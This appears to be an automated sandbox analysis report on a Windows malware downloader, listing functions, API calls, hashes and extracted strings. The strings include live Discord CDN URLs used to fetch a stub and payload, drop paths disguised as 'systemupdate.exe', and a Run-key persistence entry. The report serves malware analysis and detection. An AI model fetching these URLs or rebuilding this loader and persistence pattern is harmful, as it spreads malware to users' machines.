Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 3ca1666730983f6e47e6bd8b46a8185acceccf588d54ab14c1f925a000177e32
Instruction ID: b30c0eea3c25be752e42b6d551513441e8d5c13f85d75dbf713c6eda6c227090
Opcode Fuzzy Hash: 3ca1666730983f6e47e6bd8b46a8185acceccf588d54ab14c1f925a000177e32
Instruction Fuzzy Hash: 04116D72B146008AF700CF65E85439E77B4B7447A8F540228DE6C9BBE8DF7DC6048B40

Function 00007FF75F960690 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

basic_filebuf::_M_convert_to_external conversion error, xrefs: 00007FF75F96098C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: basic_filebuf::_M_convert_to_external conversion error
API String ID: 0-246983510
Opcode ID: bb89181ad19e12bff7c8edc647310de023b942b22020fe0dcee449d8483e88b1
Instruction ID: b4d15d7f14d6e0ba0316898ad0bd93496e8db77a40eb091cbd5d7c8365329ee0
Opcode Fuzzy Hash: bb89181ad19e12bff7c8edc647310de023b942b22020fe0dcee449d8483e88b1
Instruction Fuzzy Hash: E381A032A14EC185EB60AF66E8806EDA761FB45BD8F984532EE5C977ACCF38D445C310

Function 00007FF75F8CDDB4 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 239
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF75F8CDDE6
GetProcessAffinityMask.KERNEL32 ref: 00007FF75F8CDDF9
GetCurrentProcess.KERNEL32 ref: 00007FF75F8CDE7F
GetProcessAffinityMask.KERNEL32 ref: 00007FF75F8CDE8F
GetCurrentProcess.KERNEL32 ref: 00007FF75F8CDED0
SetProcessAffinityMask.KERNEL32 ref: 00007FF75F8CDED9

Strings

kernel32.dll, xrefs: 00007FF75F998FA6
AddVectoredExceptionHandler, xrefs: 00007FF75F998FC2
RemoveVectoredExceptionHandler, xrefs: 00007FF75F998FCE
once %p is %ld, xrefs: 00007FF75F8CE049

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID: once %p is %ld$AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
API String ID: 1231390398-2209695033
Opcode ID: 78040492f7c789932cbad59554d0e2ac16fc68af9ea6f82cf9bc5063c19f101b
Instruction ID: 33e47a8d76ea38a44a56126c38ea7792ed1a20fe0a5611a975ad5b199effb32a
Opcode Fuzzy Hash: 78040492f7c789932cbad59554d0e2ac16fc68af9ea6f82cf9bc5063c19f101b
Instruction Fuzzy Hash: 93919162A19B8285FA50BF25A8412F9A3A1BF85784F8D4035ED4D8F3A9DF3CF451D320

Function 00007FF75F8CD620 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 113
threadlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF75F8CD640
CreateEventA.KERNEL32 ref: 00007FF75F8CD656
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,00007FF75F9D0190,00000000), ref: 00007FF75F8CD69B
GetCurrentThread.KERNEL32 ref: 00007FF75F8CD6A0
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,00007FF75F9D0190,00000000), ref: 00007FF75F8CD6A9
DuplicateHandle.KERNEL32 ref: 00007FF75F8CD6D0
GetThreadPriority.KERNEL32 ref: 00007FF75F8CD6E2
TlsSetValue.KERNEL32 ref: 00007FF75F8CD70E
TlsGetValue.KERNEL32 ref: 00007FF75F8CD73F
abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F5C
GetModuleHandleA.KERNEL32 ref: 00007FF75F998FAD
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FCC
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FDF

Strings

kernel32.dll, xrefs: 00007FF75F998FA6
AddVectoredExceptionHandler, xrefs: 00007FF75F998FC2
RemoveVectoredExceptionHandler, xrefs: 00007FF75F998FCE

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Current$Thread$AddressHandleProcProcessValue$CreateDuplicateEventModulePriorityabort
String ID: AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
API String ID: 1214264455-3889795909
Opcode ID: 5e5ca316a5dd528cb957c2e3e638406e9f9fd5cf8aff8c4c91fe77490861b3b7
Instruction ID: e874a29adea9cd58e1f6feb6ec94027353e5a4c7f3c00eb929be1cec485eb725
Opcode Fuzzy Hash: 5e5ca316a5dd528cb957c2e3e638406e9f9fd5cf8aff8c4c91fe77490861b3b7
Instruction Fuzzy Hash: 55418472A05B8286E750BF65E8453A9B7A4FB44BA4F9C0235C95D873A9DF3CE085C720

Function 00007FF75F8B1C51 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF75F8B164A: RegOpenKeyExA.KERNEL32 ref: 00007FF75F8B1699
Part of subcall function 00007FF75F8B164A: RegSetValueExA.KERNEL32 ref: 00007FF75F8B16E9
Part of subcall function 00007FF75F8B164A: RegCloseKey.KERNEL32 ref: 00007FF75F8B16F9

Part of subcall function 00007FF75F994540: strlen.MSVCRT ref: 00007FF75F994554

SetFileAttributesA.KERNEL32 ref: 00007FF75F8B1F67

Strings

APPDATA, xrefs: 00007FF75F8B1E58
[ERROR] Failed to retrieve AppData path., xrefs: 00007FF75F8B1EA0
[DEBUG] Decrypted Stub URL: , xrefs: 00007FF75F8B1DD4
[ERROR] Failed to download stub., xrefs: 00007FF75F8B2007
[ERROR] Stub execution failed., xrefs: 00007FF75F8B209C
[ERROR] Failed to download payload., xrefs: 00007FF75F8B2053
[DEBUG] Decrypted Payload URL: , xrefs: 00007FF75F8B1E0E
https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&, xrefs: 00007FF75F8B1CF3
\SystemCache, xrefs: 00007FF75F8B1EE0
\systemupdate.exe, xrefs: 00007FF75F8B1F96
\google.bin, xrefs: 00007FF75F8B1FD2
https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b&, xrefs: 00007FF75F8B1D5E

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: AttributesCloseFileOpenValuestrlen
String ID: APPDATA$[DEBUG] Decrypted Payload URL: $[DEBUG] Decrypted Stub URL: $[ERROR] Failed to download payload.$[ERROR] Failed to download stub.$[ERROR] Failed to retrieve AppData path.$[ERROR] Stub execution failed.$\SystemCache$\google.bin$\systemupdate.exe$https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b&$https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&
API String ID: 1796351351-1238473508
Opcode ID: 5684216bab689a2e5fd844c8897a3a047322cc8e07a79fca03803bba086b1ab6
Instruction ID: a66966b5f72134eb58d20dcc1e79a469baa96335c6f1c5d38c79ae73798a85b4
Opcode Fuzzy Hash: 5684216bab689a2e5fd844c8897a3a047322cc8e07a79fca03803bba086b1ab6
Instruction Fuzzy Hash: 22C10155B19BC7A9EF14FB61E8552E8A365EB45788FC4003ADD0D4B76AEF2CE204C360

Function 00007FF75F8B164A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF75F8B1699
RegSetValueExA.KERNEL32 ref: 00007FF75F8B16E9
RegCloseKey.KERNEL32 ref: 00007FF75F8B16F9

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF75F8B1659
SystemUpdate, xrefs: 00007FF75F8B1664

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CloseOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SystemUpdate
API String ID: 779948276-2516375341
Opcode ID: a6fbd37789bf50f14d0cf8b3bf4aef5c31cd6dbac9869d6062af0d37f6d5f9ca
Instruction ID: 086857375e2e80169b8d039206408602115bfaae1d8b1c408c06f7b13dc18fb7
Opcode Fuzzy Hash: a6fbd37789bf50f14d0cf8b3bf4aef5c31cd6dbac9869d6062af0d37f6d5f9ca
Instruction Fuzzy Hash: DC114232B15F4588EB10EB66EC403E97764B748B98F880239DE4C47768DF3DD1558710

Function 00007FF75F990B80 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00007FF75F990D40

Strings

, xrefs: 00007FF75F990DBF
[LOG] Attempting to download: , xrefs: 00007FF75F990B8B

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fwrite
String ID: $[LOG] Attempting to download:
API String ID: 3559309478-605300840
Opcode ID: 35c748a329b104d94a45aafcac4b54b25731e19889ab6158177169bb9313834d
Instruction ID: dc82de05c62fb6093acc4fc62e7dbbfaac3c0e4d4cdc7615bcf4949c5e04dcdd
Opcode Fuzzy Hash: 35c748a329b104d94a45aafcac4b54b25731e19889ab6158177169bb9313834d
Instruction Fuzzy Hash: 9AB19122B08E8585EB55AB2AC2403BDB761FB44F84F994031EF5D577A9CF38E455C360

Function 00007FF75F8B1A4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF75F994540: strlen.MSVCRT ref: 00007FF75F994554

CreateProcessA.KERNEL32 ref: 00007FF75F8B1B65

Strings

[ERROR] Failed to execute stub. Error code: , xrefs: 00007FF75F8B1B70
[LOG] Executing stub with command: , xrefs: 00007FF75F8B1AB5

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CreateProcessstrlen
String ID: [ERROR] Failed to execute stub. Error code: $[LOG] Executing stub with command:
API String ID: 249919501-2382379905
Opcode ID: c24d35469b1108bb13d269d029743976d34a8232619999a385899f6eb1c8a766
Instruction ID: c715c9d1fd6d4a43983ae68f63d0b1e9dd1b3a7ec532906446c25b4a3a9bb822
Opcode Fuzzy Hash: c24d35469b1108bb13d269d029743976d34a8232619999a385899f6eb1c8a766
Instruction Fuzzy Hash: 9A416165B05B8699EF54EB56E8543E9A3A4FB48B88F884036DD4C8B769EF3CD1048350

Function 00007FF75F997260 Relevance: 3.8, APIs: 3, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF75F997277

Part of subcall function 00007FF75F997260: malloc.MSVCRT ref: 00007FF75F99734F

malloc.MSVCRT ref: 00007FF75F9972DA

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: c47856b857129955c1b31f7fbaee8910f7bd3682f8a8d1ed22e497bb2dcc9029
Instruction ID: b8d10377635bdc01cdc7c6c3bb9b283542452fc38d698317ab7fc6d27b8eda71
Opcode Fuzzy Hash: c47856b857129955c1b31f7fbaee8910f7bd3682f8a8d1ed22e497bb2dcc9029
Instruction Fuzzy Hash: FE212755B16B8580FE58B764A6113F892819F487A0FCD4A34DE3C8B3C9DF3CA050C321

Function 00007FF75F9490F0 Relevance: 3.2, APIs: 2, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wstat64.MSVCRT ref: 00007FF75F949161

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _wstat64
String ID:
API String ID: 969268460-0
Opcode ID: aa471045af863ddf46173c7f8a063773cfadfad5ac4e3db11b43ebc3625e4d70
Instruction ID: bdf95a488d6c311bc50c0a94d9c2139e53167548924be1c86653470ecc43748e
Opcode Fuzzy Hash: aa471045af863ddf46173c7f8a063773cfadfad5ac4e3db11b43ebc3625e4d70
Instruction Fuzzy Hash: 17A16322A08FC281EB74AB15E4443FAA3A2FB95784F988132DA9D8779DDF3CD444C711

Function 00007FF75F958F90 Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_write.MSVCRT ref: 00007FF75F958FC8
_errno.MSVCRT ref: 00007FF75F958FD5

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _errno_write
String ID:
API String ID: 3328065147-0
Opcode ID: 0722ed42b16776d322e148a2577bebc649d8b0cf3e471dc7acd448d21c9ee544
Instruction ID: fbf0739cf4f949006ac46d267de8b6329e96c4493ace0e253b21b73ef73331c1
Opcode Fuzzy Hash: 0722ed42b16776d322e148a2577bebc649d8b0cf3e471dc7acd448d21c9ee544
Instruction Fuzzy Hash: 77F0A762F2999254F9653A273D484F6D1421F9DBE1EEC4530ED1CCB7C99E2CE8828360

Function 00007FF75F8D1CE0 Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wmkdir.MSVCRT ref: 00007FF75F8D1CF0
_errno.MSVCRT ref: 00007FF75F8D1D20

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _errno_wmkdir
String ID:
API String ID: 1395797427-0
Opcode ID: b3ebaf47002cb53b71cf7cd388377f7b71bb69677ebe8acefb996eb32ef534bf
Instruction ID: 27796c3f1bd79bc93b1bbbd831ed1e2d37669bef05208a1248327becf5d240db
Opcode Fuzzy Hash: b3ebaf47002cb53b71cf7cd388377f7b71bb69677ebe8acefb996eb32ef534bf
Instruction Fuzzy Hash: 8AF06262B08D8245F7E03B65E8447F9A3919F54B84F9C8031D90DCB359DF2CB8919361

Function 00007FF75F960EA0 Relevance: 1.5, APIs: 1, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf7fe9475661202f59f9329a6d9ae8e9eb21126316b82ffe668b83d55dfba970
Instruction ID: 256a1547fd797c3034b85f27655a0428c17fa433981509ec5318c130eee7cb0e
Opcode Fuzzy Hash: bf7fe9475661202f59f9329a6d9ae8e9eb21126316b82ffe668b83d55dfba970
Instruction Fuzzy Hash: 7C917F22A18FC585EF61AF39D5403EDA360EB59F98F884235DE4C973A9DF28E485C350

Function 00007FF75F994540 Relevance: 1.3, APIs: 1, Instructions: 29stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F994554

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: e0d6c23f35871a76e10bfc20fda53440a60b0e83b9a9d2f759ed260345d8a448
Instruction ID: 078ccc9f79d65856d3e684a96f79e70cd48bb96baf16c8c4f00697220bb58a79
Opcode Fuzzy Hash: e0d6c23f35871a76e10bfc20fda53440a60b0e83b9a9d2f759ed260345d8a448
Instruction Fuzzy Hash: C8E092A2F5A65941FC49F31B79960E852156F89FD8A8D8430DE0C4FB5ADE2DD8934340

Non-executed Functions

Function 00007FF75F8CF0C0 Relevance: 38.0, APIs: 25, Instructions: 488sleepCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32 ref: 00007FF75F8CF14B
Sleep.KERNEL32 ref: 00007FF75F8CF162

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CreateEventSleep
String ID:
API String ID: 3100162736-0
Opcode ID: 77bdf4cf5fff6ca6c48dd6c238851755aee8bebf27c9e3655bbdc20e9207426b
Instruction ID: 6354f0e9c1e9bfd14b81bbef7b3fa78503a4a398a8a3000dfe14ff14cb2bf552
Opcode Fuzzy Hash: 77bdf4cf5fff6ca6c48dd6c238851755aee8bebf27c9e3655bbdc20e9207426b
Instruction Fuzzy Hash: CE124F22A09B8281FB54BF25A8053F9A354AF45B64F9C4231DA2D8E6D5DF3CF491E370

Function 00007FF75F8C0D00 Relevance: 31.6, APIs: 21, Instructions: 148fileCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF75F8C0D3F
